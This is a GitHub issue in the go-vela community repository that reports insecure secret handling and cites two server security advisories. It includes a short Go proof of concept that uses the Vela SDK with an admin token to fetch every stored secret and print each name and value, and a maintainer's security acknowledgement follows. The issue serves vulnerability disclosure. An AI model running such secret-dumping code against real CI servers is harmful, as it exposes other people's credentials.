### ISSUE TITLE
Secrets are not safe

### ISSUE THREAD

**Issue by xiadan767** [go-vela/community#713]
## Description

The database should not retrieve all secrets.

## Value

* https://github.com/go-vela/server/security/advisories/GHSA-5m7g-pj8w-7593
* https://github.com/go-vela/server/security/advisories/GHSA-8j3f-mhq8-gmh4

```
package main

import (
    "fmt"
    "github.com/go-vela/sdk-go/vela"
    "os"
)

func main() {
    // create client to connect to vela
    client, err := vela.NewClient(os.Getenv("VELA_SERVER_ADDR"), "vela", nil)
    if err != nil {
	    panic(err)
    }

    // add PAT to request
    client.Authentication.SetTokenAuth(os.Getenv("VELA_SERVER_SECRET"))


    secrets, _, err := client.Admin.Secret.GetAll(&vela.ListOptions{})
    if err != nil {
	    panic(err)
    }

    for _, secret := range *secrets {
	    fmt.Println(*secret.Name)
	    fmt.Println(*secret.Value)
    }
}
```

**Comment by slushpupie** [comment]
Thank you for contacting Target. At Target, we take security seriously and appreciate your diligence in contacting us directly. This report has been shared with our security team for investigation and follow-up, and we will share updates as they are made available.
